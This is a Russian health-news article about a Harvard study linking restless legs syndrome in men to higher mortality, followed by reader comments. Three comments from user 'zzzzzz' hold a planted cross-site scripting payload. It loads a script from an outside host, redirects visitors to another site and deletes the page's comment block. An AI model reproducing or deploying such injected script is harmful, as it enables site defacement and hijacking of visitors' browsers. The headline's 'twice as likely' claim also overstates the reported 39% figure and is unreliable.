Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ворочаетесь по ночам? У в...  >>  Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше!
 
Обратная связь
 

Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше!

Размер шрифта
12 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ворочаетесь во сне? Это может быть вовсе не так безобидно, как вы думаете.

У мужчин, страдающих синдромом беспокойных ног, появился дополнительный повод для переживаний: согласно результатам последних исследований у них на 39% повышен риск ранней смертности.

Исследование проводилось на базе Гарвардского университета, в нем участвовало почти двадцать тысяч человек. Работа была опубликована 12 июня в авторитетнейшем научном журнале Neurology.

«В данном исследовании мы доказали, что у лиц с синдромом беспокойных ног повышен риск преждевременной смерти», – утверждает доктор Цань Гао, доцент Гарвардской Медицинской школы. «Эта закономерность проявилась независимо от других известных факторов риска».

Что мешает нам спать?

Cиндром беспокойных ног (болезнь Уиллиса-Экбома) – это состояние, при котором у человека в покое появляются неприятные ощущения в конечностях (чаще в ногах, но не только), которые вынуждают его совершать непроизвольные движения. Это, конечно, нарушает благополучие сна – человек часто просыпается, на утро чувствует себя разбитым.

Предполагают, что чаще всего это состояние имеет неврологические причины, а именно – дефицит вещества дофамина. Кроме того, синдром беспокойных ног может быть и вторичным состоянием, осложняющим такие болезни, как сахарный диабет, периферическая полинейропатия и другие. Наконец, его могут вызывать некоторые лекарственные препараты (антипсихотики).

Гао утверждает, что у пациентов с этим синдромом часто отмечает дефицит железа, и препараты этого микроэлемента могут облегчать симптоматику. Однако передозировка железом может быть опасна, поэтому необходимо измерить уровень сывороточного железа перед назначением препаратов.

Смертоносный недосып

В данном исследовании приняли участие 18 500 американских мужчин, за которыми наблюдали в течение восьми лет. На момент начала исследования ни у одного испытуемого не было диабета, артрита и заболеваний почек. Средний возраст составил 67 лет.

У четырех процентов испытуемых (690 человек) был диагностирован синдром беспокойных ног. Эти люди чаще принимали антидепрессанты, у них чаще возникала ишемическая болезнь сердца и паркинсонизм. И, конечно, в этой группе испытуемых на порядок чаще встречалась бессонница.

В течение исследования умерло примерно 2 800 человек. Смертность в группе испытуемых с синдромом беспокойных ног оказалась на 39% выше, чем среди остальных участников исследования. При этом когда ученые исключили влияние других факторов риска (ожирение, вредные привычки, хронические заболевания и другие), эта цифра изменилась вовсе не драматически, составив 30%.

Причины этой взаимосвязи пока не вполне ясны. «Возможно, истоки проблемы нужно искать в недостаточной продолжительности и качестве сна», – утверждает доктор Гао. «Одно ясно наверняка: необходимы дальнейшие исследования в этой области, в том числе – среди женщин».

Если вы ворочаетесь по ночам – обратитесь к врачу! И выясните причину ваших беспокойных ног! Тогда вы сможете избежать смерти!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:31

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:11

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Во сколько ложиться спать, чтобы не попасть в аварию? Вы удивитесь!   Как прикорнуть и зарядиться энергией на день   Храп вызывает смертельное заболевание легких! Сколько храпеть вредно?   Как правильно спать  
03 июня 2013Недосып лечит депрессию. Сколько спать, чтобы не сойти с ума? 15 июля 2013Сколько нужно спать, чтобы помнить все
 
11 июля 2013Ворочаетесь по ночам? У вас в два раза больше шансов умереть раньше! 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Почему вы не можете выспаться. Часть 1
Как спать с бронхитом
Как провести день, чтобы выспаться

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.